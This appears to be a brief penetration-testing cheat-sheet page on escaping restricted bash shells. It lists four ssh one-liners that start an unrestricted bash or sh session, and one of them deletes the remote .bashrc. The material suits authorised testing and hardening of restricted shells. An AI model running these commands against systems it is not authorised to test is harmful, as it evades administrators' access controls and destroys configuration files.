For the complete documentation index, see llms.txt. This page is also available as Markdown.

bypass bash restrictions

ssh (most common)

ssh user@IP -t "bash --noprofile"
ssh -t user@IP bash --norc --noprofile
ssh -t user@IP /bin/sh
ssh -t user@IP "bash --norc --noprofile -c '/bin/rm .bashrc'"

References

Last updated